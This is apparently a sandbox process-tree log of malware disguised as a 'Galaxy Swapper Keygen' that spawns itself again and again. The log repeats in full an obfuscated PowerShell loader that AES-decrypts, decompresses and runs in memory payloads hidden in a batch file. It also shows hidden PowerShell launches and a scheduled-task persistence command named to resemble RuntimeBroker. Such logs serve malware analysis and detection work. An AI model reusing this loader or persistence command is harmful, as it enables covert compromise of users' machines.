C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
102⤵
PID:10756

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
101⤵
PID:5396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
102⤵
PID:6980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
103⤵
PID:5440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
103⤵
- Command and Scripting Interpreter: PowerShell
PID:11392

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_3_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
104⤵
PID:5196

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
102⤵
PID:6272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
103⤵
PID:1660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
104⤵
PID:3336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
104⤵
- Command and Scripting Interpreter: PowerShell
PID:6524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_122_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_122.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
105⤵
PID:1284

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
103⤵
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
104⤵
PID:6432

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
104⤵
PID:5180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
105⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
105⤵
PID:6540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
106⤵
PID:5404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
107⤵
PID:12664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
107⤵
- Command and Scripting Interpreter: PowerShell
PID:12692

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
106⤵
PID:5412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
107⤵
PID:6448

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
107⤵
PID:7000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
108⤵
PID:5928

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
108⤵
PID:6540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
109⤵
PID:6264

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
109⤵
PID:5184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
110⤵
PID:7176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
111⤵
PID:10008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
111⤵
- Command and Scripting Interpreter: PowerShell
PID:8560

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
110⤵
PID:7220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
111⤵
PID:7284

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
111⤵
PID:7300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
112⤵
PID:7388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
113⤵
PID:6976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
113⤵
- Command and Scripting Interpreter: PowerShell
PID:1680

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
112⤵
PID:7416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
113⤵
PID:7552

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
113⤵
PID:7580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
114⤵
PID:7760

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
114⤵
PID:7804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
115⤵
PID:7920

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
115⤵
PID:7948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
116⤵
PID:8080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
117⤵
PID:3148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
117⤵
PID:11020

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
116⤵
PID:8108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
117⤵
PID:8184

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
117⤵
PID:5888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
118⤵
PID:7344

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
118⤵
PID:7348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
119⤵
PID:7812

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
119⤵
PID:7636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
120⤵
PID:8124

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
120⤵
PID:404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
121⤵
PID:5972

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
121⤵
PID:3560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
122⤵
PID:6552

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
122⤵
PID:6812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
123⤵
PID:7996

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
123⤵
PID:8040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
124⤵
PID:7808

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
124⤵
PID:7488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
125⤵
PID:7232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
126⤵
PID:12192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
126⤵
- Command and Scripting Interpreter: PowerShell
PID:10564

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
125⤵
PID:6824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
126⤵
PID:6936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
127⤵
PID:11824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
127⤵
- Command and Scripting Interpreter: PowerShell
PID:8264

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
126⤵
PID:6672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
127⤵
PID:8212

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
